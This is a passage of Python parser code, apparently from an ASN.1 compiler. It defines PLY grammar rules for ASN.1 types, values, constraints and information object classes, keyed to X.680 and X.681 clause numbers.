t[0] = Value_Ref(val=t[1])
def p_AssignmentList_1 (t):
'AssignmentList : AssignmentList Assignment'
t[0] = t[1] + [t[2]]
def p_AssignmentList_2 (t):
'AssignmentList : Assignment SEMICOLON'
t[0] = [t[1]]
def p_AssignmentList_3 (t):
'AssignmentList : Assignment'
t[0] = [t[1]]
def p_Assignment (t):
'''Assignment : TypeAssignment
| ValueAssignment
| ValueSetTypeAssignment
| ObjectClassAssignment
| ObjectAssignment
| ObjectSetAssignment
| ParameterizedAssignment
| pyquote '''
t[0] = t[1]
# 13 Referencing type and value definitions -----------------------------------
# 13.1
def p_DefinedType (t):
'''DefinedType : ExternalTypeReference
| type_ref
| ParameterizedType'''
t[0] = t[1]
def p_DefinedValue_1(t):
'''DefinedValue : ExternalValueReference'''
t[0] = t[1]
def p_DefinedValue_2(t):
'''DefinedValue : identifier ''' # instead of valuereference wich causes reduce/reduce conflict
t[0] = Value_Ref(val=t[1])
# 13.6
def p_ExternalTypeReference (t):
'ExternalTypeReference : modulereference DOT type_ref'
t[0] = Node ('ExternalTypeReference', module = t[1], typ = t[3])
def p_ExternalValueReference (t):
'ExternalValueReference : modulereference DOT identifier'
t[0] = Node ('ExternalValueReference', module = t[1], ident = t[3])
# 15 Assigning types and values -----------------------------------------------
# 15.1
def p_TypeAssignment (t):
'TypeAssignment : UCASE_IDENT ASSIGNMENT Type'
t[0] = t[3]
t[0].SetName(t[1])
# 15.2
def p_ValueAssignment (t):
'ValueAssignment : LCASE_IDENT ValueType ASSIGNMENT Value'
t[0] = ValueAssignment(ident = t[1], typ = t[2], val = t[4])
# only "simple" types are supported to simplify grammer
def p_ValueType (t):
'''ValueType : type_ref
| BooleanType
| IntegerType
| ObjectIdentifierType
| OctetStringType
| RealType '''
t[0] = t[1]
# 15.6
def p_ValueSetTypeAssignment (t):
'ValueSetTypeAssignment : UCASE_IDENT ValueType ASSIGNMENT ValueSet'
t[0] = Node('ValueSetTypeAssignment', name=t[1], typ=t[2], val=t[4])
# 15.7
def p_ValueSet (t):
'ValueSet : lbraceignore rbraceignore'
t[0] = None
# 16 Definition of types and values -------------------------------------------
# 16.1
def p_Type (t):
'''Type : BuiltinType
| ReferencedType
| ConstrainedType'''
t[0] = t[1]
# 16.2
def p_BuiltinType (t):
'''BuiltinType : AnyType
| BitStringType
| BooleanType
| CharacterStringType
| ChoiceType
| EmbeddedPDVType
| EnumeratedType
| ExternalType
| InstanceOfType
| IntegerType
| NullType
| ObjectClassFieldType
| ObjectIdentifierType
| OctetStringType
| RealType
| RelativeOIDType
| SequenceType
| SequenceOfType
| SetType
| SetOfType
| TaggedType'''
t[0] = t[1]
# 16.3
def p_ReferencedType (t):
'''ReferencedType : DefinedType
| UsefulType
| SelectionType'''
t[0] = t[1]
# 16.5
def p_NamedType (t):
'NamedType : identifier Type'
t[0] = t[2]
t[0].SetName (t[1])
# 16.7
def p_Value (t):
'''Value : BuiltinValue
| ReferencedValue
| ObjectClassFieldValue'''
t[0] = t[1]
# 16.9
def p_BuiltinValue (t):
'''BuiltinValue : BooleanValue
| ChoiceValue
| IntegerValue
| ObjectIdentifierValue
| RealValue
| SequenceValue
| hex_string
| binary_string
| char_string''' # XXX we don't support {data} here
t[0] = t[1]
# 16.11
def p_ReferencedValue (t):
'''ReferencedValue : DefinedValue
| ValueFromObject'''
t[0] = t[1]
# 16.13
#def p_NamedValue (t):
# 'NamedValue : identifier Value'
# t[0] = Node ('NamedValue', ident = t[1], value = t[2])
# 17 Notation for the boolean type --------------------------------------------
# 17.1
def p_BooleanType (t):
'BooleanType : BOOLEAN'
t[0] = BooleanType ()
# 17.2
def p_BooleanValue (t):
'''BooleanValue : TRUE
| FALSE'''
t[0] = t[1]
# 18 Notation for the integer type --------------------------------------------
# 18.1
def p_IntegerType_1 (t):
'IntegerType : INTEGER'
t[0] = IntegerType (named_list = None)
def p_IntegerType_2 (t):
'IntegerType : INTEGER LBRACE NamedNumberList RBRACE'
t[0] = IntegerType(named_list = t[3])
def p_NamedNumberList_1 (t):
'NamedNumberList : NamedNumber'
t[0] = [t[1]]
def p_NamedNumberList_2 (t):
'NamedNumberList : NamedNumberList COMMA NamedNumber'
t[0] = t[1] + [t[3]]
def p_NamedNumber (t):
'''NamedNumber : identifier LPAREN SignedNumber RPAREN
| identifier LPAREN DefinedValue RPAREN'''
t[0] = NamedNumber(ident = t[1], val = t[3])
def p_SignedNumber_1 (t):
'SignedNumber : NUMBER'
t[0] = t [1]
def p_SignedNumber_2 (t):
'SignedNumber : MINUS NUMBER'
t[0] = '-' + t[2]
# 18.9
def p_IntegerValue (t):
'IntegerValue : SignedNumber'
t[0] = t [1]
# 19 Notation for the enumerated type -----------------------------------------
# 19.1
def p_EnumeratedType (t):
'EnumeratedType : ENUMERATED LBRACE Enumerations RBRACE'
t[0] = EnumeratedType (val = t[3]['val'], ext = t[3]['ext'])
def p_Enumerations_1 (t):
'Enumerations : Enumeration'
t[0] = { 'val' : t[1], 'ext' : None }
def p_Enumerations_2 (t):
'Enumerations : Enumeration COMMA ELLIPSIS ExceptionSpec'
t[0] = { 'val' : t[1], 'ext' : [] }
def p_Enumerations_3 (t):
'Enumerations : Enumeration COMMA ELLIPSIS ExceptionSpec COMMA Enumeration'
t[0] = { 'val' : t[1], 'ext' : t[6] }
def p_Enumeration_1 (t):
'Enumeration : EnumerationItem'
t[0] = [t[1]]
def p_Enumeration_2 (t):
'Enumeration : Enumeration COMMA EnumerationItem'
t[0] = t[1] + [t[3]]
def p_EnumerationItem (t):
'''EnumerationItem : Identifier
| NamedNumber'''
t[0] = t[1]
def p_Identifier (t):
'Identifier : identifier'
t[0] = Node ('Identifier', ident = t[1])
# 20 Notation for the real type -----------------------------------------------
# 20.1
def p_RealType (t):
'RealType : REAL'
t[0] = RealType ()
# 20.6
def p_RealValue (t):
'''RealValue : REAL_NUMBER
| SpecialRealValue'''
t[0] = t [1]
def p_SpecialRealValue (t):
'''SpecialRealValue : PLUS_INFINITY
| MINUS_INFINITY'''
t[0] = t[1]
# 21 Notation for the bitstring type ------------------------------------------
# 21.1
def p_BitStringType_1 (t):
'BitStringType : BIT STRING'
t[0] = BitStringType (named_list = None)
def p_BitStringType_2 (t):
'BitStringType : BIT STRING LBRACE NamedBitList RBRACE'
t[0] = BitStringType (named_list = t[4])
def p_NamedBitList_1 (t):
'NamedBitList : NamedBit'
t[0] = [t[1]]
def p_NamedBitList_2 (t):
'NamedBitList : NamedBitList COMMA NamedBit'
t[0] = t[1] + [t[3]]
def p_NamedBit (t):
'''NamedBit : identifier LPAREN NUMBER RPAREN
| identifier LPAREN DefinedValue RPAREN'''
t[0] = NamedNumber (ident = t[1], val = t[3])
# 22 Notation for the octetstring type ----------------------------------------
# 22.1
def p_OctetStringType (t):
'OctetStringType : OCTET STRING'
t[0] = OctetStringType ()
# 23 Notation for the null type -----------------------------------------------
# 23.1
def p_NullType (t):
'NullType : NULL'
t[0] = NullType ()
# 23.3
def p_NullValue (t):
'NullValue : NULL'
t[0] = NullValue ()
# 24 Notation for sequence types ----------------------------------------------
# 24.1
def p_SequenceType_1 (t):
'SequenceType : SEQUENCE LBRACE RBRACE'
t[0] = SequenceType (elt_list = [])
def p_SequenceType_2 (t):
'SequenceType : SEQUENCE LBRACE ComponentTypeLists RBRACE'
t[0] = SequenceType (elt_list = t[3]['elt_list'])
if 'ext_list' in t[3]:
t[0].ext_list = t[3]['ext_list']
if 'elt_list2' in t[3]:
t[0].elt_list2 = t[3]['elt_list2']
def p_ExtensionAndException_1 (t):
'ExtensionAndException : ELLIPSIS'
t[0] = []
def p_OptionalExtensionMarker_1 (t):
'OptionalExtensionMarker : COMMA ELLIPSIS'
t[0] = True
def p_OptionalExtensionMarker_2 (t):
'OptionalExtensionMarker : '
t[0] = False
def p_ComponentTypeLists_1 (t):
'ComponentTypeLists : ComponentTypeList'
t[0] = {'elt_list' : t[1]}
def p_ComponentTypeLists_2 (t):
'ComponentTypeLists : ComponentTypeList COMMA ExtensionAndException OptionalExtensionMarker'
t[0] = {'elt_list' : t[1], 'ext_list' : []}
def p_ComponentTypeLists_3 (t):
'ComponentTypeLists : ComponentTypeList COMMA ExtensionAndException ExtensionAdditionList OptionalExtensionMarker'
t[0] = {'elt_list' : t[1], 'ext_list' : t[4]}
def p_ComponentTypeLists_4 (t):
'ComponentTypeLists : ComponentTypeList COMMA ExtensionAndException ExtensionEndMarker COMMA ComponentTypeList'
t[0] = {'elt_list' : t[1], 'ext_list' : [], 'elt_list2' : t[6]}
def p_ComponentTypeLists_5 (t):
'ComponentTypeLists : ComponentTypeList COMMA ExtensionAndException ExtensionAdditionList ExtensionEndMarker COMMA ComponentTypeList'
t[0] = {'elt_list' : t[1], 'ext_list' : t[4], 'elt_list2' : t[7]}
def p_ComponentTypeLists_6 (t):
'ComponentTypeLists : ExtensionAndException OptionalExtensionMarker'
t[0] = {'elt_list' : [], 'ext_list' : []}
def p_ComponentTypeLists_7 (t):
'ComponentTypeLists : ExtensionAndException ExtensionAdditionList OptionalExtensionMarker'
t[0] = {'elt_list' : [], 'ext_list' : t[2]}
def p_ExtensionEndMarker (t):
'ExtensionEndMarker : COMMA ELLIPSIS'
pass
def p_ExtensionAdditionList_1 (t):
'ExtensionAdditionList : COMMA ExtensionAddition'
t[0] = [t[2]]
def p_ExtensionAdditionList_2 (t):
'ExtensionAdditionList : ExtensionAdditionList COMMA ExtensionAddition'
t[0] = t[1] + [t[3]]
def p_ExtensionAddition_1 (t):
'ExtensionAddition : ExtensionAdditionGroup'
t[0] = Node ('elt_type', val = t[1], optional = 0)
def p_ExtensionAddition_2 (t):
'ExtensionAddition : ComponentType'
t[0] = t[1]
def p_ExtensionAdditionGroup (t):
'ExtensionAdditionGroup : LVERBRACK VersionNumber ComponentTypeList RVERBRACK'
t[0] = ExtensionAdditionGroup (ver = t[2], elt_list = t[3])
def p_VersionNumber_1 (t):
'VersionNumber : '
def p_VersionNumber_2 (t):
'VersionNumber : NUMBER COLON'
t[0] = t[1]
def p_ComponentTypeList_1 (t):
'ComponentTypeList : ComponentType'
t[0] = [t[1]]
def p_ComponentTypeList_2 (t):
'ComponentTypeList : ComponentTypeList COMMA ComponentType'
t[0] = t[1] + [t[3]]
def p_ComponentType_1 (t):
'ComponentType : NamedType'
t[0] = Node ('elt_type', val = t[1], optional = 0)
def p_ComponentType_2 (t):
'ComponentType : NamedType OPTIONAL'
t[0] = Node ('elt_type', val = t[1], optional = 1)
def p_ComponentType_3 (t):
'ComponentType : NamedType DEFAULT DefaultValue'
t[0] = Node ('elt_type', val = t[1], optional = 1, default = t[3])
def p_ComponentType_4 (t):
'ComponentType : COMPONENTS OF Type'
t[0] = Node ('components_of', typ = t[3])
def p_DefaultValue_1 (t):
'''DefaultValue : ReferencedValue
| BooleanValue
| ChoiceValue
| IntegerValue
| RealValue
| hex_string
| binary_string
| char_string
| ObjectClassFieldValue'''
t[0] = t[1]
def p_DefaultValue_2 (t):
'DefaultValue : lbraceignore rbraceignore'
t[0] = ''
# 24.17
def p_SequenceValue_1 (t):
'SequenceValue : LBRACE RBRACE'
t[0] = []
#def p_SequenceValue_2 (t):
# 'SequenceValue : LBRACE ComponentValueList RBRACE'
# t[0] = t[2]
#def p_ComponentValueList_1 (t):
# 'ComponentValueList : NamedValue'
# t[0] = [t[1]]
#def p_ComponentValueList_2 (t):
# 'ComponentValueList : ComponentValueList COMMA NamedValue'
# t[0] = t[1] + [t[3]]
# 25 Notation for sequence-of types -------------------------------------------
# 25.1
def p_SequenceOfType (t):
'''SequenceOfType : SEQUENCE OF Type
| SEQUENCE OF NamedType'''
t[0] = SequenceOfType (val = t[3], size_constr = None)
# 26 Notation for set types ---------------------------------------------------
# 26.1
def p_SetType_1 (t):
'SetType : SET LBRACE RBRACE'
t[0] = SetType (elt_list = [])
def p_SetType_2 (t):
'SetType : SET LBRACE ComponentTypeLists RBRACE'
t[0] = SetType (elt_list = t[3]['elt_list'])
if 'ext_list' in t[3]:
t[0].ext_list = t[3]['ext_list']
if 'elt_list2' in t[3]:
t[0].elt_list2 = t[3]['elt_list2']
# 27 Notation for set-of types ------------------------------------------------
# 27.1
def p_SetOfType (t):
'''SetOfType : SET OF Type
| SET OF NamedType'''
t[0] = SetOfType (val = t[3])
# 28 Notation for choice types ------------------------------------------------
# 28.1
def p_ChoiceType (t):
'ChoiceType : CHOICE LBRACE AlternativeTypeLists RBRACE'
if 'ext_list' in t[3]:
t[0] = ChoiceType (elt_list = t[3]['elt_list'], ext_list = t[3]['ext_list'])
else:
t[0] = ChoiceType (elt_list = t[3]['elt_list'])
def p_AlternativeTypeLists_1 (t):
'AlternativeTypeLists : AlternativeTypeList'
t[0] = {'elt_list' : t[1]}
def p_AlternativeTypeLists_2 (t):
'AlternativeTypeLists : AlternativeTypeList COMMA ExtensionAndException ExtensionAdditionAlternatives OptionalExtensionMarker'
t[0] = {'elt_list' : t[1], 'ext_list' : t[4]}
def p_ExtensionAdditionAlternatives_1 (t):
'ExtensionAdditionAlternatives : ExtensionAdditionAlternativesList'
t[0] = t[1]
def p_ExtensionAdditionAlternatives_2 (t):
'ExtensionAdditionAlternatives : '
t[0] = []
def p_ExtensionAdditionAlternativesList_1 (t):
'ExtensionAdditionAlternativesList : COMMA ExtensionAdditionAlternative'
t[0] = t[2]
def p_ExtensionAdditionAlternativesList_2 (t):
'ExtensionAdditionAlternativesList : ExtensionAdditionAlternativesList COMMA ExtensionAdditionAlternative'
t[0] = t[1] + t[3]
def p_ExtensionAdditionAlternative_1 (t):
'ExtensionAdditionAlternative : NamedType'
t[0] = [t[1]]
def p_ExtensionAdditionAlternative_2 (t):
'ExtensionAdditionAlternative : ExtensionAdditionAlternativesGroup'
t[0] = t[1]
def p_ExtensionAdditionAlternativesGroup (t):
'ExtensionAdditionAlternativesGroup : LVERBRACK VersionNumber AlternativeTypeList RVERBRACK'
t[0] = t[3]
def p_AlternativeTypeList_1 (t):
'AlternativeTypeList : NamedType'
t[0] = [t[1]]
def p_AlternativeTypeList_2 (t):
'AlternativeTypeList : AlternativeTypeList COMMA NamedType'
t[0] = t[1] + [t[3]]
# 28.10
def p_ChoiceValue_1 (t):
'''ChoiceValue : identifier COLON Value
| identifier COLON NullValue '''
val = t[3]
if not isinstance(val, Value):
val = Value(val=val)
t[0] = ChoiceValue (choice = t[1], val = val)
# 29 Notation for selection types
# 29.1
def p_SelectionType (t): #
'SelectionType : identifier LT Type'
t[0] = SelectionType (typ = t[3], sel = t[1])
# 30 Notation for tagged types ------------------------------------------------
# 30.1
def p_TaggedType_1 (t):
'TaggedType : Tag Type'
t[1].mode = 'default'
t[0] = t[2]
t[0].AddTag(t[1])
def p_TaggedType_2 (t):
'''TaggedType : Tag IMPLICIT Type
| Tag EXPLICIT Type'''
t[1].mode = t[2]
t[0] = t[3]
t[0].AddTag(t[1])
def p_Tag (t):
'Tag : LBRACK Class ClassNumber RBRACK'
t[0] = Tag(cls = t[2], num = t[3])
def p_ClassNumber_1 (t):
'ClassNumber : number'
t[0] = t[1]
def p_ClassNumber_2 (t):
'ClassNumber : DefinedValue'
t[0] = t[1]
def p_Class_1 (t):
'''Class : UNIVERSAL
| APPLICATION
| PRIVATE'''
t[0] = t[1]
def p_Class_2 (t):
'Class :'
t[0] = 'CONTEXT'
# 31 Notation for the object identifier type ----------------------------------
# 31.1
def p_ObjectIdentifierType (t):
'ObjectIdentifierType : OBJECT IDENTIFIER'
t[0] = ObjectIdentifierType()
# 31.3
def p_ObjectIdentifierValue (t):
'ObjectIdentifierValue : LBRACE oid_comp_list RBRACE'
t[0] = ObjectIdentifierValue (comp_list=t[2])
def p_oid_comp_list_1 (t):
'oid_comp_list : oid_comp_list ObjIdComponents'
t[0] = t[1] + [t[2]]
def p_oid_comp_list_2 (t):
'oid_comp_list : ObjIdComponents'
t[0] = [t[1]]
def p_ObjIdComponents (t):
'''ObjIdComponents : NameForm
| NumberForm
| NameAndNumberForm'''
t[0] = t[1]
def p_NameForm (t):
'''NameForm : LCASE_IDENT
| LCASE_IDENT_ASSIGNED'''
t [0] = t[1]
def p_NumberForm (t):
'''NumberForm : NUMBER'''
# | DefinedValue'''
t [0] = t[1]
def p_NameAndNumberForm (t):
'''NameAndNumberForm : LCASE_IDENT_ASSIGNED LPAREN NumberForm RPAREN
| LCASE_IDENT LPAREN NumberForm RPAREN'''
t[0] = Node('name_and_number', ident = t[1], number = t[3])
# 32 Notation for the relative object identifier type -------------------------
# 32.1
def p_RelativeOIDType (t):
'RelativeOIDType : RELATIVE_OID'
t[0] = RelativeOIDType()
# 33 Notation for the embedded-pdv type ---------------------------------------
# 33.1
def p_EmbeddedPDVType (t):
'EmbeddedPDVType : EMBEDDED PDV'
t[0] = EmbeddedPDVType()
# 34 Notation for the external type -------------------------------------------
# 34.1
def p_ExternalType (t):
'ExternalType : EXTERNAL'
t[0] = ExternalType()
# 36 Notation for character string types --------------------------------------
# 36.1
def p_CharacterStringType (t):
'''CharacterStringType : RestrictedCharacterStringType
| UnrestrictedCharacterStringType'''
t[0] = t[1]
# 37 Definition of restricted character string types --------------------------
def p_RestrictedCharacterStringType_1 (t):
'RestrictedCharacterStringType : BMPString'
t[0] = BMPStringType ()
def p_RestrictedCharacterStringType_2 (t):
'RestrictedCharacterStringType : GeneralString'
t[0] = GeneralStringType ()
def p_RestrictedCharacterStringType_3 (t):
'RestrictedCharacterStringType : GraphicString'
t[0] = GraphicStringType ()
def p_RestrictedCharacterStringType_4 (t):
'RestrictedCharacterStringType : IA5String'
t[0] = IA5StringType ()
def p_RestrictedCharacterStringType_5 (t):
'RestrictedCharacterStringType : ISO646String'
t[0] = ISO646StringType ()
def p_RestrictedCharacterStringType_6 (t):
'RestrictedCharacterStringType : NumericString'
t[0] = NumericStringType ()
def p_RestrictedCharacterStringType_7 (t):
'RestrictedCharacterStringType : PrintableString'
t[0] = PrintableStringType ()
def p_RestrictedCharacterStringType_8 (t):
'RestrictedCharacterStringType : TeletexString'
t[0] = TeletexStringType ()
def p_RestrictedCharacterStringType_9 (t):
'RestrictedCharacterStringType : T61String'
t[0] = T61StringType ()
def p_RestrictedCharacterStringType_10 (t):
'RestrictedCharacterStringType : UniversalString'
t[0] = UniversalStringType ()
def p_RestrictedCharacterStringType_11 (t):
'RestrictedCharacterStringType : UTF8String'
t[0] = UTF8StringType ()
def p_RestrictedCharacterStringType_12 (t):
'RestrictedCharacterStringType : VideotexString'
t[0] = VideotexStringType ()
def p_RestrictedCharacterStringType_13 (t):
'RestrictedCharacterStringType : VisibleString'
t[0] = VisibleStringType ()
# 40 Definition of unrestricted character string types ------------------------
# 40.1
def p_UnrestrictedCharacterStringType (t):
'UnrestrictedCharacterStringType : CHARACTER STRING'
t[0] = UnrestrictedCharacterStringType ()
# 41 Notation for types defined in clauses 42 to 44 ---------------------------
# 42 Generalized time ---------------------------------------------------------
def p_UsefulType_1 (t):
'UsefulType : GeneralizedTime'
t[0] = GeneralizedTime()
# 43 Universal time -----------------------------------------------------------
def p_UsefulType_2 (t):
'UsefulType : UTCTime'
t[0] = UTCTime()
# 44 The object descriptor type -----------------------------------------------
def p_UsefulType_3 (t):
'UsefulType : ObjectDescriptor'
t[0] = ObjectDescriptor()
# 45 Constrained types --------------------------------------------------------
# 45.1
def p_ConstrainedType_1 (t):
'ConstrainedType : Type Constraint'
t[0] = t[1]
t[0].AddConstraint(t[2])
def p_ConstrainedType_2 (t):
'ConstrainedType : TypeWithConstraint'
t[0] = t[1]
# 45.5
def p_TypeWithConstraint_1 (t):
'''TypeWithConstraint : SET Constraint OF Type
| SET SizeConstraint OF Type'''
t[0] = SetOfType (val = t[4], constr = t[2])
def p_TypeWithConstraint_2 (t):
'''TypeWithConstraint : SEQUENCE Constraint OF Type
| SEQUENCE SizeConstraint OF Type'''
t[0] = SequenceOfType (val = t[4], constr = t[2])
def p_TypeWithConstraint_3 (t):
'''TypeWithConstraint : SET Constraint OF NamedType
| SET SizeConstraint OF NamedType'''
t[0] = SetOfType (val = t[4], constr = t[2])
def p_TypeWithConstraint_4 (t):
'''TypeWithConstraint : SEQUENCE Constraint OF NamedType
| SEQUENCE SizeConstraint OF NamedType'''
t[0] = SequenceOfType (val = t[4], constr = t[2])
# 45.6
# 45.7
def p_Constraint (t):
'Constraint : LPAREN ConstraintSpec ExceptionSpec RPAREN'
t[0] = t[2]
def p_ConstraintSpec (t):
'''ConstraintSpec : ElementSetSpecs
| GeneralConstraint'''
t[0] = t[1]
# 46 Element set specification ------------------------------------------------
# 46.1
def p_ElementSetSpecs_1 (t):
'ElementSetSpecs : RootElementSetSpec'
t[0] = t[1]
def p_ElementSetSpecs_2 (t):
'ElementSetSpecs : RootElementSetSpec COMMA ELLIPSIS'
t[0] = t[1]
t[0].ext = True
def p_ElementSetSpecs_3 (t):
'ElementSetSpecs : RootElementSetSpec COMMA ELLIPSIS COMMA AdditionalElementSetSpec'
t[0] = t[1]
t[0].ext = True
def p_RootElementSetSpec (t):
'RootElementSetSpec : ElementSetSpec'
t[0] = t[1]
def p_AdditionalElementSetSpec (t):
'AdditionalElementSetSpec : ElementSetSpec'
t[0] = t[1]
def p_ElementSetSpec (t):
'ElementSetSpec : Unions'
t[0] = t[1]
def p_Unions_1 (t):
'Unions : Intersections'
t[0] = t[1]
def p_Unions_2 (t):
'Unions : UElems UnionMark Intersections'
t[0] = Constraint(type = 'Union', subtype = [t[1], t[3]])
def p_UElems (t):
'UElems : Unions'
t[0] = t[1]
def p_Intersections_1 (t):
'Intersections : IntersectionElements'
t[0] = t[1]
def p_Intersections_2 (t):
'Intersections : IElems IntersectionMark IntersectionElements'
t[0] = Constraint(type = 'Intersection', subtype = [t[1], t[3]])
def p_IElems (t):
'IElems : Intersections'
t[0] = t[1]
def p_IntersectionElements (t):
'IntersectionElements : Elements'
t[0] = t[1]
def p_UnionMark (t):
'''UnionMark : BAR
| UNION'''
def p_IntersectionMark (t):
'''IntersectionMark : CIRCUMFLEX
| INTERSECTION'''
# 46.5
def p_Elements_1 (t):
'Elements : SubtypeElements'
t[0] = t[1]
def p_Elements_2 (t):
'Elements : LPAREN ElementSetSpec RPAREN'
t[0] = t[2]
# 47 Subtype elements ---------------------------------------------------------
# 47.1 General
def p_SubtypeElements (t):
'''SubtypeElements : SingleValue
| ContainedSubtype
| ValueRange
| PermittedAlphabet
| SizeConstraint
| TypeConstraint
| InnerTypeConstraints
| PatternConstraint'''
t[0] = t[1]
# 47.2 Single value
# 47.2.1
def p_SingleValue (t):
'SingleValue : Value'
t[0] = Constraint(type = 'SingleValue', subtype = t[1])
# 47.3 Contained subtype
# 47.3.1
def p_ContainedSubtype (t):
'ContainedSubtype : Includes Type'
t[0] = Constraint(type = 'ContainedSubtype', subtype = t[2])
def p_Includes (t):
'''Includes : INCLUDES
| '''
# 47.4 Value range
# 47.4.1
def p_ValueRange (t):
'ValueRange : LowerEndpoint RANGE UpperEndpoint'
t[0] = Constraint(type = 'ValueRange', subtype = [t[1], t[3]])
# 47.4.3
def p_LowerEndpoint_1 (t):
'LowerEndpoint : LowerEndValue'
t[0] = t[1]
def p_LowerEndpoint_2 (t):
'LowerEndpoint : LowerEndValue LT'
t[0] = t[1] # but not inclusive range
def p_UpperEndpoint_1 (t):
'UpperEndpoint : UpperEndValue'
t[0] = t[1]
def p_UpperEndpoint_2 (t):
'UpperEndpoint : LT UpperEndValue'
t[0] = t[1] # but not inclusive range
# 47.4.4
def p_LowerEndValue (t):
'''LowerEndValue : Value
| MIN'''
t[0] = t[1] # XXX
def p_UpperEndValue (t):
'''UpperEndValue : Value
| MAX'''
t[0] = t[1]
# 47.5 Size constraint
# 47.5.1
def p_SizeConstraint (t):
'SizeConstraint : SIZE Constraint'
t[0] = Constraint (type = 'Size', subtype = t[2])
# 47.6 Type constraint
# 47.6.1
def p_TypeConstraint (t):
'TypeConstraint : Type'
t[0] = Constraint (type = 'Type', subtype = t[1])
# 47.7 Permitted alphabet
# 47.7.1
def p_PermittedAlphabet (t):
'PermittedAlphabet : FROM Constraint'
t[0] = Constraint (type = 'From', subtype = t[2])
# 47.8 Inner subtyping
# 47.8.1
def p_InnerTypeConstraints (t):
'''InnerTypeConstraints : WITH COMPONENT SingleTypeConstraint
| WITH COMPONENTS MultipleTypeConstraints'''
pass # ignore PER invisible constraint
# 47.8.3
def p_SingleTypeConstraint (t):
'SingleTypeConstraint : Constraint'
t[0] = t[1]
# 47.8.4
def p_MultipleTypeConstraints (t):
'''MultipleTypeConstraints : FullSpecification
| PartialSpecification'''
t[0] = t[1]
def p_FullSpecification (t):
'FullSpecification : LBRACE TypeConstraints RBRACE'
t[0] = t[2]
def p_PartialSpecification (t):
'PartialSpecification : LBRACE ELLIPSIS COMMA TypeConstraints RBRACE'
t[0] = t[4]
def p_TypeConstraints_1 (t):
'TypeConstraints : named_constraint'
t [0] = [t[1]]
def p_TypeConstraints_2 (t):
'TypeConstraints : TypeConstraints COMMA named_constraint'
t[0] = t[1] + [t[3]]
def p_named_constraint_1 (t):
'named_constraint : identifier constraint'
return Node ('named_constraint', ident = t[1], constr = t[2])
def p_named_constraint_2 (t):
'named_constraint : constraint'
return Node ('named_constraint', constr = t[1])
def p_constraint (t):
'constraint : value_constraint presence_constraint'
t[0] = Node ('constraint', value = t[1], presence = t[2])
def p_value_constraint_1 (t):
'value_constraint : Constraint'
t[0] = t[1]
def p_value_constraint_2 (t):
'value_constraint : '
pass
def p_presence_constraint_1 (t):
'''presence_constraint : PRESENT
| ABSENT
| OPTIONAL'''
t[0] = t[1]
def p_presence_constraint_2 (t):
'''presence_constraint : '''
pass
# 47.9 Pattern constraint
# 47.9.1
def p_PatternConstraint (t):
'PatternConstraint : PATTERN Value'
t[0] = Constraint (type = 'Pattern', subtype = t[2])
# 49 The exception identifier
# 49.4
def p_ExceptionSpec_1 (t):
'ExceptionSpec : EXCLAMATION ExceptionIdentification'
pass
def p_ExceptionSpec_2 (t):
'ExceptionSpec : '
pass
def p_ExceptionIdentification (t):
'''ExceptionIdentification : SignedNumber
| DefinedValue
| Type COLON Value '''
pass
# /*-----------------------------------------------------------------------*/
# /* Value Notation Productions */
# /*-----------------------------------------------------------------------*/
def p_binary_string (t):
'binary_string : BSTRING'
t[0] = BStringValue(val = t[1])
def p_hex_string (t):
'hex_string : HSTRING'
t[0] = HStringValue(val = t[1])
def p_char_string (t):
'char_string : QSTRING'
t[0] = t[1]
def p_number (t):
'number : NUMBER'
t[0] = t[1]
#--- ITU-T Recommendation X.208 -----------------------------------------------
# 27 Notation for the any type ------------------------------------------------
# 27.1
def p_AnyType (t):
'''AnyType : ANY
| ANY DEFINED BY identifier'''
t[0] = AnyType()
#--- ITU-T Recommendation X.681 -----------------------------------------------
# 7 ASN.1 lexical items -------------------------------------------------------
# 7.1 Information object class references
def p_objectclassreference (t):
'objectclassreference : CLASS_IDENT'
t[0] = Class_Ref(val=t[1])
# 7.2 Information object references
def p_objectreference (t):
'objectreference : LCASE_IDENT'
t[0] = t[1]
# 7.3 Information object set references
#def p_objectsetreference (t):
# 'objectsetreference : UCASE_IDENT'
# t[0] = t[1]
# 7.4 Type field references
# ucasefieldreference
# 7.5 Value field references
# lcasefieldreference
# 7.6 Value set field references
# ucasefieldreference
# 7.7 Object field references
# lcasefieldreference
# 7.8 Object set field references
# ucasefieldreference
def p_ucasefieldreference (t):
'ucasefieldreference : AMPERSAND UCASE_IDENT'
t[0] = '&' + t[2]
def p_lcasefieldreference (t):
'lcasefieldreference : AMPERSAND LCASE_IDENT'
t[0] = '&' + t[2]
# 8 Referencing definitions
# 8.1
def p_DefinedObjectClass (t):
'''DefinedObjectClass : objectclassreference
| UsefulObjectClassReference'''
t[0] = t[1]
global obj_class
obj_class = t[0].val
def p_DefinedObject (t):
'''DefinedObject : objectreference'''
t[0] = t[1]
# 8.4
def p_UsefulObjectClassReference (t):
'''UsefulObjectClassReference : TYPE_IDENTIFIER
| ABSTRACT_SYNTAX'''
t[0] = Class_Ref(val=t[1])
# 9 Information object class definition and assignment
# 9.1
def p_ObjectClassAssignment (t):
'''ObjectClassAssignment : CLASS_IDENT ASSIGNMENT ObjectClass
| UCASE_IDENT ASSIGNMENT ObjectClass'''
t[0] = t[3]
t[0].SetName(t[1])
if isinstance(t[0], ObjectClassDefn):
t[0].reg_types()
# 9.2
def p_ObjectClass (t):
'''ObjectClass : DefinedObjectClass
| ObjectClassDefn
| ParameterizedObjectClass '''
t[0] = t[1]
# 9.3
def p_ObjectClassDefn (t):
'''ObjectClassDefn : CLASS LBRACE FieldSpecs RBRACE
| CLASS LBRACE FieldSpecs RBRACE WithSyntaxSpec'''
t[0] = ObjectClassDefn(fields = t[3])
def p_FieldSpecs_1 (t):
'FieldSpecs : FieldSpec'
t[0] = [t[1]]
def p_FieldSpecs_2 (t):
'FieldSpecs : FieldSpecs COMMA FieldSpec'
t[0] = t[1] + [t[3]]
def p_WithSyntaxSpec (t):
'WithSyntaxSpec : WITH SYNTAX lbraceignore rbraceignore'
t[0] = None
# 9.4
def p_FieldSpec (t):
'''FieldSpec : TypeFieldSpec
| FixedTypeValueFieldSpec
| VariableTypeValueFieldSpec
| FixedTypeValueSetFieldSpec
| ObjectFieldSpec
| ObjectSetFieldSpec '''
t[0] = t[1]
# 9.5
def p_TypeFieldSpec (t):
'''TypeFieldSpec : ucasefieldreference
| ucasefieldreference TypeOptionalitySpec '''
t[0] = TypeFieldSpec()
t[0].SetName(t[1])
def p_TypeOptionalitySpec_1 (t):
'TypeOptionalitySpec ::= OPTIONAL'
pass
def p_TypeOptionalitySpec_2 (t):
'TypeOptionalitySpec ::= DEFAULT Type'
pass
# 9.6
def p_FixedTypeValueFieldSpec (t):
